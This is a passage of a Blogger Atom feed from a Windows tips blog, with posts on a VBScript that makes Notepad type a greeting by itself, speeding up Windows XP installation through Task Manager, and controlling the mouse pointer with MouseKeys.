<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7387936170644921109</id><updated>2012-02-16T17:50:13.191-08:00</updated><category term='hack'/><category term='Vista'/><category term='registry entry'/><category term='Internet'/><category term='Graphics'/><category term='Run'/><category term='Other'/><category term='XP'/><category term='Language'/><category term='Linux'/><category term='hide'/><category term='Notepad'/><category term='pendrive'/><category term='Windows'/><category term='Fun'/><category term='speedup'/><category term='Mobile Phones'/><category term='Softwares'/><category term='shortcut'/><category term='Windows 7'/><title type='text'>xynotes</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default?start-index=101&amp;max-results=100'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>285</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3749262667849312520</id><published>2010-11-08T08:03:00.000-08:00</published><updated>2010-11-08T08:03:09.213-08:00</updated><title type='text'>How To Make Notepad Write On Its Own</title><content type='html'>&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;1. Open the Notepad and Type the Code Given Below.&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote style="border-left-color: rgb(16, 116, 201); border-left-style: solid; border-left-width: 4px; color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 1.3em; margin-bottom: 5px; margin-left: 5px; margin-right: 5px; margin-top: 5px; padding-bottom: 0px; padding-left: 15px; padding-right: 20px; padding-top: 0px;"&gt;&lt;span style="color: #323232; font-family: arial; font-size: 13px;"&gt;set wshshell = wscript.CreateObject("wscript.shell")&lt;br /&gt;wshshell.run "Notepad"&lt;br /&gt;wscript.sleep 2000&lt;br /&gt;wshshell.AppActivate "Notepad"&lt;br /&gt;WshShell.SendKeys "H"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "ell"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "o "&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys " "&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys " Friends"&lt;/span&gt;&lt;/blockquote&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;2. Save it as anyname.vbs (Note the vbs extension)&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;3. Now Open the anyname.vbs file by doublecliking on it and see the Magic..&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3749262667849312520?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3749262667849312520/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/11/how-to-make-notepad-write-on-its-own.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3749262667849312520'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3749262667849312520'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/11/how-to-make-notepad-write-on-its-own.html' title='How To Make Notepad Write On Its Own'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6844639624906378839</id><published>2010-11-08T08:01:00.001-08:00</published><updated>2010-11-08T08:02:05.718-08:00</updated><title type='text'>INSTALLING XP IN 10 MINUTES!</title><content type='html'>&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;b&gt;STEP1 :&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;After the Copy Part is Over ... System is Rebooted as we all know In general Foramatting Procedure...&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;Now After Reboot The Below Image Will Appear....&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;a href="http://1.bp.blogspot.com/_Za6UPEUpjR4/SvTbiEI6MUI/AAAAAAAAAqs/CAED7yUlecA/s1600/winxp_rc1_rev_01.gif" imageanchor="1" style="color: #1074c9; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_Za6UPEUpjR4/SvTbiEI6MUI/AAAAAAAAAqs/CAED7yUlecA/s320/winxp_rc1_rev_01.gif" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;b&gt;STEP 2:&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;Now As This Image APPEARS You Have to Press &amp;nbsp;"&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Shift + F10&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;" &amp;nbsp;. This Will Open The command Prompt... &amp;nbsp;Now type &amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;b&gt;&lt;span style="font-size: x-large;"&gt;taskmgr&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&amp;nbsp;in it. This will open the Task manager .&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;b&gt;STEP 3 :&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;After The task Manager Opens Goto Processes ... And Find "&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Setup.exe&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;" &amp;nbsp;process and Right CLICK on It.... and set the Priority to Highest....&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_Za6UPEUpjR4/SvTgIJtoS1I/AAAAAAAAAq0/b8znHYeusYw/s1600/lok.PNG" imageanchor="1" style="clear: left; color: #1074c9; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_Za6UPEUpjR4/SvTgIJtoS1I/AAAAAAAAAq0/b8znHYeusYw/s320/lok.PNG" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;b&gt;STEP 4:&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;Now Just Watch the Set It will take around 9 minutes and 2 minutes for Tolerance(depends System to system)....&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;Thats the Overall&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-clip: initial !important; background-color: transparent !important; background-image: none !important; background-origin: initial !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(0, 153, 0) !important; border-bottom-style: solid !important; border-bottom-width: 1px !important; color: #009900; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px !important; font-style: normal !important; font-weight: normal !important; padding-bottom: 1px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static; text-decoration: underline !important;"&gt;Tutorial&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;...Hope You all Have LIKED IT...&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;So When you Format your PC Next Time It will Really Save Your TIME i.e around 20 to 25 minutes...&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6844639624906378839?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6844639624906378839/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/11/installing-xp-in-10-minutes.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6844639624906378839'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6844639624906378839'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/11/installing-xp-in-10-minutes.html' title='INSTALLING XP IN 10 MINUTES!'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Za6UPEUpjR4/SvTbiEI6MUI/AAAAAAAAAqs/CAED7yUlecA/s72-c/winxp_rc1_rev_01.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6522178285257445038</id><published>2010-11-08T08:00:00.000-08:00</published><updated>2010-11-08T08:00:21.660-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='shortcut'/><title type='text'>How to Control move Mouse Pointer from Keyboard</title><content type='html'>&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;How to Control move Mouse Pointer from Keyboard&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px; text-align: center;"&gt;&lt;a href="http://www.tricksmachine.com/wp-content/uploads/2009/07/mousekeys1.jpg" imageanchor="1" style="clear: left; color: #1074c9; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="132" src="http://www.tricksmachine.com/wp-content/uploads/2009/07/mousekeys1.jpg" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;You can try this method if you are bore of using your mouse in normal way.You can control your mouse pointer with keyboard keys in all windows . When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can perform all tasks which are same as of normal mouse.&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;b&gt;&lt;br /&gt;Follow the given steps to activate the keyboard mouse:&lt;/b&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;1.&amp;nbsp; log into your computer with administrative rights.&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;2. To activate this feature, press left Alt+left Shift+NumLock keys at once and you will receive a small MouseKey box.&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;3. To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;4. Click on Settings button, if you want to adjust the mouse cursor detail settings.&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;5. A new dialog box will appear with "Settings for MouseKeys", now you can do all mouse settings ,for example mouse cursor speed, acceleration and some other features.&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;6. Now using Numeric keypad, you can move your mouse pointer where you want to move on desktop&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #4c4b4c; font-family: Arial, sans-serif, tahoma, Verdana; font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6522178285257445038?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6522178285257445038/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/11/how-to-control-move-mouse-pointer-from.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6522178285257445038'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6522178285257445038'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/11/how-to-control-move-mouse-pointer-from.html' title='How to Control move Mouse Pointer from Keyboard'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' 